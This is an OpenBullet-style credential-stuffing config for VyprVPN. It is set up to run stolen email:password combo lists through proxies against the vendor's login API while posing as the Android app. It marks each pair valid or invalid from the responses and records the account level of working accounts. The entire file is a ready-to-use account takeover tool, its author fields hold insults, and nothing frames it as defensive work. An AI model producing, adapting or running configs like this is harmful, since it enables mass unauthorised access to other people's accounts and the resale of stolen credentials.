[SETTINGS]
{
  "Name": "VyprVPN.com",
  "SuggestedBots": 20,
  "LastModified": "2019-06-30T12:56:28.6207705-05:00",
  "AdditionalInfo": "go fck urself",
  "Author": "ur mum",
  "Version": "really big number",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login_Post REQUEST GET "https://api.goldenfrog.com/settings" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-API-Version: 2" 
  HEADER "X-API-Features: partial_sign_up;" 
  HEADER "X-GF-PRODUCT: VyprVPN" 
  HEADER "X-GF-PRODUCT-VERSION: 2.30.0.10229" 
  HEADER "X-GF-PLATFORM: Android" 
  HEADER "X-GF-PLATFORM-VERSION: 4.4.2" 
  HEADER "locale: tr_TR" 
  HEADER "Connection: close" 
  HEADER "username: <USER>" 
  HEADER "X-GF-Agent: VyprVPN Android v2.30.0.10229. (4a5ff82c)" 
  HEADER "password: <PASS>" 
  HEADER "Host: api.goldenfrog.com" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "User-Agent: okhttp/3.8.1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "confirmed\": true" 
    KEY "\"external_id\": " 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
PARSE "<SOURCE>" LR "\"account_level\": \"" "\"" Recursive=FALSE -> CAP "Account Level" "" "" 
